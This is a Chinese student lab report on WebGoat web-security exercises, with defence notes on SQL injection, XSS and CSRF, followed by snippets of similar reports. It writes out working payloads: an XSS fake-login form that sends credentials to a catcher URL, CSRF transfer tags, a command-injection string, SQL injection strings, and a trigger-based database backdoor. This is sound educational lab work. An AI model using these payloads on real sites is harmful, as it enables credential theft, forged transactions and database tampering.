20155216 Exp9 Web安全基础实践

Exp9 Web安全基础实践

基础问题回答

1、SQL注入攻击原理,如何防御?

1.对用户的输入进行校验,可以通过正则表达式,双"-"进行转换等。
2.不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
3.不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。
4.不要把机密信息直接存放,加密或者hash掉密码和敏感的信息。
5.应用的异常信息应该给出尽可能少的提示。
6.采取辅助软件或网站平台来检测sql注入。

2、XSS攻击的原理,如何防御?

在表单提交或者url参数传递前,对需要的参数进行过滤;
检查用户输入的内容中是否有非法内容,如尖括号、引号等,严格控制输出。

3、CSRF攻击原理,如何防御?

通过referer、token或者验证码来检测用户提交;
尽量不要在页面的链接中暴露用户隐私信息,对于用户修改删除等操作最好都使用post操作;
避免全站通用的cookie,严格设置cookie的域。

实践内容

关于WebGoat

  • WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,目前提供的训练课程有很多,包含了XSS、线程安全、SQL注入等,我们本次的实验就是在WebGoat平台上进行。

在终端中输入 java -jar webgoat-container-7.0.1-war-exec.jar 开启WebGoat。

显示结果为WebGoat未安装。

使用 sudo apt-get install default-jre 安装默认的 jre

在使用命令 wget https://s3.amazonaws.com/webgoat-war/webgoat-container-7.0-SNAPSHOT-war-exec.jar 下载WebGoat:

使用命令 java -jar webgoat-container-7.0-SNAPSHOT-war-exec.jar 运行WebGoat:

结果webgoat中没有任何功能。

发现原因是kali下没有java环境,可参考java环境安装安装java环境:

java环境安装完成。

再次运行 java -jar webgoat-container-7.0-SNAPSHOT-war-exec.jar 启动WebGoat:

XSS攻击

1、Phishing with XSS

跨站脚本攻击最大的魅力是通过HTML注入劫持用户的浏览器,任意构造用户当前浏览的HTML内容,甚至可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击。

在webgoat找到xss攻击打开Phishing with XSS(第一个):

编写一个包含用户名、密码的前端代码:

<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>

</div></div>
</form>
  <script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>

将这段代码输入到输入框中,点击search出现如下登录框:

在登录框中输入用户名、密码:

2、Stored XSS Attacks

我们的目标是要创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容,这个很容易啊,在上个实验中我们也做过,直接在title里随便输点啥,然后在message中输入一串代码,比如:

点击提交后,在点击Message List下的20155216:

3、Reflected XSS Attacks

反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。

在输入框中输入内容:

点击Purchase:

CSRF攻击

CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。

攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及财产安全。

1、Cross Site Request Forgery(CSRF)

查看页面右边Parameters中的src和menu值。

message框中输入代码: <img src=‘attack?Screen=src值&menu=menu值&transferFunds=转账数额‘ width=‘1‘ height=‘1‘>

点击下发的20155216:

显示攻击成功。

2、CSRF Prompt By-Pass

message框中输入代码:

<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe>
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>

攻击成功。

Injection Flaws

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

1、Command Injection

这个题是要求能够在目标主机上执行系统命令,我们可以通过火狐浏览器下的一个扩展Firebug(就是右上角的小虫的标志)对源代码进行修改,若无Firebug,可在火狐浏览器添加工具中下载、安装、添加。例如在BackDoors.help旁边加上"& netstat -an & ipconfig":

选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况:

2、Numeric SQL Injection

我们要通过注入SQL字符串的方式查看所有的天气数据,我们上次实验做过类似的,只要加上一个1=1这种永真式即可达到我们的目的,依旧利用firebug,在任意一个值比如101旁边加上or 1=1:

选中Columbia,点Go,可以看到所有天气数据:

3、Log Spoofing

我们输入的用户名会被追加到日志文件中,所以我们可以使用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”,在User Name文本框中输入 lx%0d%0aLogin Succeeded for username: admin ,其中%0d是回车,%0a是换行符:

攻击成功。

4、 String SQL Injection

基于select语句构造SQL注入字符串,在文本框中输入 ‘ or 1=1 --

5、Database Backdoors

先输一个101,得到了该用户的信息:

可以发现输入的语句没有验证,很容易进行SQL注入,输入注入语句: 101; update employee set salary=5216 ,成功把该用户的工调整到了5216:

接下来使用语句 101;CREATE TRIGGER lxBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘ WHERE userid = NEW.userid 创建一个后门,把表中所有的邮箱和用户ID都改写:

显示注入成功。

实验总结与体会

本次实验部分时间花在了对java环境的安装以及对webgoat安装上,可能是用的kali源有问题,每次环境调试都要花很多时间。

通过本次对webgoat各种攻击的学习和练习,让我掌握了很多种攻击方式,以前只是学过相应的理论知识,而在本次实验中得以亲身实践,还是非常有趣的。本次实验主要的练习范围是三大最常见的攻击:XSS攻击,CSRF攻击和SQL注入攻击。通过实践对这三种攻击有了更深的认识,并在以后会尝试练习更多的攻击种类和对感兴趣的攻击展开更加深入的研究。

原文地址:https://www.cnblogs.com/LeeX1997/p/9076303.html

时间: 2024-11-07 08:07:48

20155216 Exp9 Web安全基础实践的相关文章

20145317彭垚《网络对抗》Exp9 Web安全基础实践

20145317彭垚<网络对抗>Exp9 Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的. 对于SQL注入攻击的防范,我觉得主要还是应该从代码上入手: 采用预编译语句集PreparedStatement,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可.它的原理就是sql注入只对sql语句的准备(编译)过程有破坏作用,而Prep

20145301赵嘉鑫 《网络对抗》Exp9 Web安全基础实践

20145301赵嘉鑫 <网络对抗>Exp9 Web安全基础实践 实验后回答问题 (1)SQL注入攻击原理,如何防御 SQL注入攻击原理:SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统.SQL 语句用于取回和更新数据库中的数据.SQL注入是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术.通过构建特殊的输入作为参数传入web应用程序,通过执行SQL语句进执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统. SQL注入

20145207 Exp9 web安全基础实践

Exp9 web安全基础实践 实验后回答问题 (1)SQL注入攻击原理,如何防御(还不会做..看的别人的感觉是这个意思) 攻击原理:修改信息 防御:禁止输入 (2)XSS攻击的原理,如何防御 攻击原理:看别人的博客,感觉就是强制访问. 防御:.....不清楚 (3)CSRF攻击原理,如何防御 没做,不知道 实验总结与体会 指导下完成,就争取完成最低标准吧,xxs弄完了,sql看不懂,回去再看看吧.先把sql提交上去. XSS注入攻击 Stored XSS Attacks 代码: <script>

20145236《网络对抗》Exp9 web安全基础实践

20145236<网络对抗>Exp9 web安全基础实践 一.基础问题回答: SQL注入攻击原理,如何防御 SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句. 对用户的输入进行校验,可以通过正则表达式,或限制长

20155308《网络对抗》Exp9 Web安全基础实践

20155308<网络对抗>Exp9 Web安全基础实践 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 实验过程 WebGoat WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞.WebGoat运行在带有java虚拟机的平台之上,目前提供的训练课程有很多,包含了XSS.线程安全.SQL注入等,我们本次的实验就是在WebGoat平台上进行. 1.WebGoat分为简单版和开发板,简单版是个Java的Jar包,

20155223 Exp9 Web安全基础实践

20155223 Exp9 Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御? 攻击原理:SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息. 防御手段: 在数据库设置防火墙,专注防御SQL注入攻击. 不再使用动态拼接SQL语句,可以使用参数化的sql或者直接使用存储过程进行数据查询存取. 用加密方式或Hash函数来存

20155210 Exp9 Web安全基础实践

Exp9 Web安全基础实践 实验过程 开启webgoat 输入java -jar webgoat-container-7.1-exec.jar,来运行webgoat 在浏览器输入localhost:8080/WebGoat,进入WebGoat开始实验 根据下图提示进行登录 XSS攻击 1.Phishing with XSS (网路钓鱼) 在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点.我们先创建一个form,让受害人在我们创建的form中填写用户名和密码,再添

20155204《网络对抗》Exp9 Web安全基础实践

20155204<网络对抗>Exp9 Web安全基础实践 一.基础问题回答 SQL注入攻击原理,如何防御? 原理: SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息. 防御: 1.普通用户与系统管理员用户的权限要有严格的区分.如果一个普通用户在使用查询语句中嵌入另一个Drop Table语句,那么是否允许执行呢?由于Drop语句

20154321 Exp9: Web安全基础实践

20154321[网络对抗技术]Exp9: Web安全基础实践 一.基础问题 SQL注入攻击原理,如何防御 SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞.也就是,在输入字符串中嵌入SQL指令,在设计程序中忽略对可能构成攻击的特殊字符串的检查.后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后台数据库等严重后果. SQL注入一般分为普通注入和盲注. 普通注入:后台数据库会回显有价值的提示信息,通过这些可能的报错信息可以更容易地进行注